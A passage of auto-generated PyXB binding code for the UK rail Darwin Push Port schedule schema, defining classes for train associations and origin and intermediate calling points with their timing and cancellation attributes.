saxer = pyxb.binding.saxer.make_parser(fallback_namespace=default_namespace, location_base=location_base)
handler = saxer.getContentHandler()
xmld = xml_text
if isinstance(xmld, _six.text_type):
xmld = xmld.encode(pyxb._InputEncoding)
saxer.parse(io.BytesIO(xmld))
instance = handler.rootObject()
return instance
def CreateFromDOM (node, default_namespace=None):
"""Create a Python instance from the given DOM node.
The node tag must correspond to an element declaration in this module.
@deprecated: Forcing use of DOM interface is unnecessary; use L{CreateFromDocument}."""
if default_namespace is None:
default_namespace = Namespace.fallbackNamespace()
return pyxb.binding.basis.element.AnyCreateFromDOM(node, default_namespace)
# Atomic simple type: {http://www.thalesgroup.com/rtti/PushPort/Schedules/v1}CategoryType
class CategoryType (pyxb.binding.datatypes.string, pyxb.binding.basis.enumeration_mixin):
"""Association Category Type: JJ=Join, VV=Split, LK=Linked, NP=Next-Working"""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'CategoryType')
_XSDLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 15, 1)
_Documentation = 'Association Category Type: JJ=Join, VV=Split, LK=Linked, NP=Next-Working'
CategoryType._CF_enumeration = pyxb.binding.facets.CF_enumeration(value_datatype=CategoryType, enum_prefix=None)
CategoryType.JJ = CategoryType._CF_enumeration.addEnumeration(unicode_value='JJ', tag='JJ')
CategoryType.VV = CategoryType._CF_enumeration.addEnumeration(unicode_value='VV', tag='VV')
CategoryType.LK = CategoryType._CF_enumeration.addEnumeration(unicode_value='LK', tag='LK')
CategoryType.NP = CategoryType._CF_enumeration.addEnumeration(unicode_value='NP', tag='NP')
CategoryType._InitializeFacetMap(CategoryType._CF_enumeration)
Namespace.addCategoryObject('typeBinding', 'CategoryType', CategoryType)
# Complex type {http://www.thalesgroup.com/rtti/PushPort/Schedules/v1}AssocService with content type EMPTY
class AssocService (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {http://www.thalesgroup.com/rtti/PushPort/Schedules/v1}AssocService with content type EMPTY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_EMPTY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'AssocService')
_XSDLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 27, 1)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Attribute wta uses Python identifier wta
__wta = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'wta'), 'wta', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_AssocService_wta', _ImportedBinding_darwinpush_xb_ct.WTimeType)
__wta._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTCommonTypes_v1.xsd', 243, 2)
__wta._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTCommonTypes_v1.xsd', 243, 2)
wta = property(__wta.value, __wta.set, None, 'Working time of arrival.')
# Attribute wtd uses Python identifier wtd
__wtd = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'wtd'), 'wtd', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_AssocService_wtd', _ImportedBinding_darwinpush_xb_ct.WTimeType)
__wtd._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTCommonTypes_v1.xsd', 248, 2)
__wtd._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTCommonTypes_v1.xsd', 248, 2)
wtd = property(__wtd.value, __wtd.set, None, 'Working time of departure.')
# Attribute wtp uses Python identifier wtp
__wtp = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'wtp'), 'wtp', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_AssocService_wtp', _ImportedBinding_darwinpush_xb_ct.WTimeType)
__wtp._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTCommonTypes_v1.xsd', 253, 2)
__wtp._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTCommonTypes_v1.xsd', 253, 2)
wtp = property(__wtp.value, __wtp.set, None, 'Working time of pass.')
# Attribute pta uses Python identifier pta
__pta = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'pta'), 'pta', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_AssocService_pta', _ImportedBinding_darwinpush_xb_ct.RTTITimeType)
__pta._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTCommonTypes_v1.xsd', 258, 2)
__pta._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTCommonTypes_v1.xsd', 258, 2)
pta = property(__pta.value, __pta.set, None, 'Public time of arrival.')
# Attribute ptd uses Python identifier ptd
__ptd = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'ptd'), 'ptd', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_AssocService_ptd', _ImportedBinding_darwinpush_xb_ct.RTTITimeType)
__ptd._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTCommonTypes_v1.xsd', 263, 2)
__ptd._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTCommonTypes_v1.xsd', 263, 2)
ptd = property(__ptd.value, __ptd.set, None, 'Public time of departure.')
# Attribute rid uses Python identifier rid
__rid = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'rid'), 'rid', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_AssocService_rid', _ImportedBinding_darwinpush_xb_ct.RIDType, required=True)
__rid._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 28, 2)
__rid._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 28, 2)
rid = property(__rid.value, __rid.set, None, 'RTTI Train ID. Note that since this is an RID, the service must already exist within Darwin.')
_ElementMap.update({
})
_AttributeMap.update({
__wta.name() : __wta,
__wtd.name() : __wtd,
__wtp.name() : __wtp,
__pta.name() : __pta,
__ptd.name() : __ptd,
__rid.name() : __rid
})
Namespace.addCategoryObject('typeBinding', 'AssocService', AssocService)
# Complex type {http://www.thalesgroup.com/rtti/PushPort/Schedules/v1}Association with content type ELEMENT_ONLY
class Association (pyxb.binding.basis.complexTypeDefinition):
"""Type describing an association between schedules"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'Association')
_XSDLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 39, 1)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {http://www.thalesgroup.com/rtti/PushPort/Schedules/v1}main uses Python identifier main
__main = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'main'), 'main', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_Association_httpwww_thalesgroup_comrttiPushPortSchedulesv1main', False, pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 44, 3), )
main = property(__main.value, __main.set, None, 'The through, previous working or link-to service')
# Element {http://www.thalesgroup.com/rtti/PushPort/Schedules/v1}assoc uses Python identifier assoc
__assoc = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'assoc'), 'assoc', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_Association_httpwww_thalesgroup_comrttiPushPortSchedulesv1assoc', False, pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 49, 3), )
assoc = property(__assoc.value, __assoc.set, None, 'The starting, terminating, subsequent working or link-from service')
# Attribute tiploc uses Python identifier tiploc
__tiploc = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'tiploc'), 'tiploc', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_Association_tiploc', _ImportedBinding_darwinpush_xb_ct.TiplocType, required=True)
__tiploc._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 55, 2)
__tiploc._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 55, 2)
tiploc = property(__tiploc.value, __tiploc.set, None, 'The TIPLOC of the location where the association occurs.')
# Attribute category uses Python identifier category
__category = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'category'), 'category', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_Association_category', CategoryType, required=True)
__category._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 60, 2)
__category._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 60, 2)
category = property(__category.value, __category.set, None, 'Association category')
# Attribute isCancelled uses Python identifier isCancelled
__isCancelled = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'isCancelled'), 'isCancelled', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_Association_isCancelled', pyxb.binding.datatypes.boolean, unicode_default='false')
__isCancelled._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 65, 2)
__isCancelled._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 65, 2)
isCancelled = property(__isCancelled.value, __isCancelled.set, None, 'True if this association is cancelled, i.e. the association exists but will no longer happen.')
# Attribute isDeleted uses Python identifier isDeleted
__isDeleted = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'isDeleted'), 'isDeleted', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_Association_isDeleted', pyxb.binding.datatypes.boolean, unicode_default='false')
__isDeleted._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 70, 2)
__isDeleted._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 70, 2)
isDeleted = property(__isDeleted.value, __isDeleted.set, None, 'True if this association is deleted, i.e. the association no longer exists.')
_ElementMap.update({
__main.name() : __main,
__assoc.name() : __assoc
})
_AttributeMap.update({
__tiploc.name() : __tiploc,
__category.name() : __category,
__isCancelled.name() : __isCancelled,
__isDeleted.name() : __isDeleted
})
Namespace.addCategoryObject('typeBinding', 'Association', Association)
# Complex type {http://www.thalesgroup.com/rtti/PushPort/Schedules/v1}OR with content type EMPTY
class OR (pyxb.binding.basis.complexTypeDefinition):
"""Defines a Passenger Origin Calling Point"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_EMPTY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'OR')
_XSDLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 116, 1)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Attribute tpl uses Python identifier tpl
__tpl = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'tpl'), 'tpl', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_OR_tpl', _ImportedBinding_darwinpush_xb_ct.TiplocType, required=True)
__tpl._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 80, 2)
__tpl._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 80, 2)
tpl = property(__tpl.value, __tpl.set, None, 'TIPLOC')
# Attribute act uses Python identifier act
__act = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'act'), 'act', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_OR_act', _ImportedBinding_darwinpush_xb_ct.ActivityType, unicode_default=' ')
__act._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 85, 2)
__act._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 85, 2)
act = property(__act.value, __act.set, None, 'Current Activity Codes')
# Attribute planAct uses Python identifier planAct
__planAct = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'planAct'), 'planAct', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_OR_planAct', _ImportedBinding_darwinpush_xb_ct.ActivityType)
__planAct._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 90, 2)
__planAct._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 90, 2)
planAct = property(__planAct.value, __planAct.set, None, 'Planned Activity Codes (if different to current activities)')
# Attribute can uses Python identifier can
__can = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'can'), 'can', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_OR_can', pyxb.binding.datatypes.boolean, unicode_default='false')
__can._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 95, 2)
__can._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 95, 2)
can = property(__can.value, __can.set, None, 'Cancelled')
# Attribute pta uses Python identifier pta
__pta = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'pta'), 'pta', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_OR_pta', _ImportedBinding_darwinpush_xb_ct.RTTITimeType)
__pta._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 105, 2)
__pta._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 105, 2)
pta = property(__pta.value, __pta.set, None, 'Public Scheduled Time of Arrival')
# Attribute ptd uses Python identifier ptd
__ptd = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'ptd'), 'ptd', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_OR_ptd', _ImportedBinding_darwinpush_xb_ct.RTTITimeType)
__ptd._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 110, 2)
__ptd._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 110, 2)
ptd = property(__ptd.value, __ptd.set, None, 'Public Scheduled Time of Departure')
# Attribute wta uses Python identifier wta
__wta = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'wta'), 'wta', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_OR_wta', _ImportedBinding_darwinpush_xb_ct.WTimeType)
__wta._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 122, 2)
__wta._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 122, 2)
wta = property(__wta.value, __wta.set, None, 'Working Scheduled Time of Arrival')
# Attribute wtd uses Python identifier wtd
__wtd = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'wtd'), 'wtd', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_OR_wtd', _ImportedBinding_darwinpush_xb_ct.WTimeType, required=True)
__wtd._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 127, 2)
__wtd._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 127, 2)
wtd = property(__wtd.value, __wtd.set, None, 'Working Scheduled Time of Departure')
# Attribute fd uses Python identifier fd
__fd = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'fd'), 'fd', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_OR_fd', _ImportedBinding_darwinpush_xb_ct.TiplocType)
__fd._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 132, 2)
__fd._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 132, 2)
fd = property(__fd.value, __fd.set, None, 'TIPLOC of False Destination to be used at this location')
_ElementMap.update({
})
_AttributeMap.update({
__tpl.name() : __tpl,
__act.name() : __act,
__planAct.name() : __planAct,
__can.name() : __can,
__pta.name() : __pta,
__ptd.name() : __ptd,
__wta.name() : __wta,
__wtd.name() : __wtd,
__fd.name() : __fd
})
Namespace.addCategoryObject('typeBinding', 'OR', OR)
# Complex type {http://www.thalesgroup.com/rtti/PushPort/Schedules/v1}OPOR with content type EMPTY
class OPOR (pyxb.binding.basis.complexTypeDefinition):
"""Defines an Operational Origin Calling Point"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_EMPTY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'OPOR')
_XSDLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 138, 1)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Attribute tpl uses Python identifier tpl
__tpl = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'tpl'), 'tpl', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_OPOR_tpl', _ImportedBinding_darwinpush_xb_ct.TiplocType, required=True)
__tpl._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 80, 2)
__tpl._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 80, 2)
tpl = property(__tpl.value, __tpl.set, None, 'TIPLOC')
# Attribute act uses Python identifier act
__act = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'act'), 'act', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_OPOR_act', _ImportedBinding_darwinpush_xb_ct.ActivityType, unicode_default=' ')
__act._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 85, 2)
__act._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 85, 2)
act = property(__act.value, __act.set, None, 'Current Activity Codes')
# Attribute planAct uses Python identifier planAct
__planAct = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'planAct'), 'planAct', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_OPOR_planAct', _ImportedBinding_darwinpush_xb_ct.ActivityType)
__planAct._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 90, 2)
__planAct._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 90, 2)
planAct = property(__planAct.value, __planAct.set, None, 'Planned Activity Codes (if different to current activities)')
# Attribute can uses Python identifier can
__can = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'can'), 'can', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_OPOR_can', pyxb.binding.datatypes.boolean, unicode_default='false')
__can._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 95, 2)
__can._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 95, 2)
can = property(__can.value, __can.set, None, 'Cancelled')
# Attribute wta uses Python identifier wta
__wta = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'wta'), 'wta', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_OPOR_wta', _ImportedBinding_darwinpush_xb_ct.WTimeType)
__wta._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 143, 2)
__wta._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 143, 2)
wta = property(__wta.value, __wta.set, None, 'Working Scheduled Time of Arrival')
# Attribute wtd uses Python identifier wtd
__wtd = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'wtd'), 'wtd', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_OPOR_wtd', _ImportedBinding_darwinpush_xb_ct.WTimeType, required=True)
__wtd._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 148, 2)
__wtd._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 148, 2)
wtd = property(__wtd.value, __wtd.set, None, 'Working Scheduled Time of Departure')
_ElementMap.update({
})
_AttributeMap.update({
__tpl.name() : __tpl,
__act.name() : __act,
__planAct.name() : __planAct,
__can.name() : __can,
__wta.name() : __wta,
__wtd.name() : __wtd
})
Namespace.addCategoryObject('typeBinding', 'OPOR', OPOR)
# Complex type {http://www.thalesgroup.com/rtti/PushPort/Schedules/v1}IP with content type EMPTY
class IP (pyxb.binding.basis.complexTypeDefinition):
"""Defines aPassenger Intermediate Calling Point"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_EMPTY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'IP')
_XSDLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 154, 1)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Attribute tpl uses Python identifier tpl
__tpl = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'tpl'), 'tpl', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_IP_tpl', _ImportedBinding_darwinpush_xb_ct.TiplocType, required=True)
__tpl._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 80, 2)
__tpl._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 80, 2)
tpl = property(__tpl.value, __tpl.set, None, 'TIPLOC')
# Attribute act uses Python identifier act
__act = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'act'), 'act', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_IP_act', _ImportedBinding_darwinpush_xb_ct.ActivityType, unicode_default=' ')
__act._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 85, 2)
__act._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 85, 2)
act = property(__act.value, __act.set, None, 'Current Activity Codes')
# Attribute planAct uses Python identifier planAct
__planAct = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'planAct'), 'planAct', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_IP_planAct', _ImportedBinding_darwinpush_xb_ct.ActivityType)
__planAct._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 90, 2)
__planAct._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 90, 2)
planAct = property(__planAct.value, __planAct.set, None, 'Planned Activity Codes (if different to current activities)')
# Attribute can uses Python identifier can
__can = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'can'), 'can', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_IP_can', pyxb.binding.datatypes.boolean, unicode_default='false')
__can._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 95, 2)
__can._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 95, 2)
can = property(__can.value, __can.set, None, 'Cancelled')
# Attribute pta uses Python identifier pta
__pta = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'pta'), 'pta', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_IP_pta', _ImportedBinding_darwinpush_xb_ct.RTTITimeType)
__pta._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 105, 2)
__pta._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 105, 2)
pta = property(__pta.value, __pta.set, None, 'Public Scheduled Time of Arrival')
# Attribute ptd uses Python identifier ptd
__ptd = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'ptd'), 'ptd', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_IP_ptd', _ImportedBinding_darwinpush_xb_ct.RTTITimeType)
__ptd._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 110, 2)
__ptd._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 110, 2)
ptd = property(__ptd.value, __ptd.set, None, 'Public Scheduled Time of Departure')
# Attribute wta uses Python identifier wta
__wta = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'wta'), 'wta', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_IP_wta', _ImportedBinding_darwinpush_xb_ct.WTimeType, required=True)
__wta._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 160, 2)
__wta._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 160, 2)
wta = property(__wta.value, __wta.set, None, 'Working Scheduled Time of Arrival')
# Attribute wtd uses Python identifier wtd
__wtd = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'wtd'), 'wtd', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_IP_wtd', _ImportedBinding_darwinpush_xb_ct.WTimeType, required=True)
__wtd._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 165, 2)
__wtd._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 165, 2)
wtd = property(__wtd.value, __wtd.set, None, 'Working Scheduled Time of Departure')
# Attribute rdelay uses Python identifier rdelay
__rdelay = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'rdelay'), 'rdelay', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_IP_rdelay', _ImportedBinding_darwinpush_xb_ct.DelayValueType, unicode_default='0')
__rdelay._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 170, 2)
__rdelay._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 170, 2)
rdelay = property(__rdelay.value, __rdelay.set, None, "A delay value that is implied by a change to the service's route. This value has been added to the forecast lateness of the service at the previous schedule location when calculating the expected lateness of arrival at this location.")
# Attribute fd uses Python identifier fd
__fd = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'fd'), 'fd', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_IP_fd', _ImportedBinding_darwinpush_xb_ct.TiplocType)
__fd._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 175, 2)
__fd._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 175, 2)
fd = property(__fd.value, __fd.set, None, 'TIPLOC of False Destination to be used at this location')
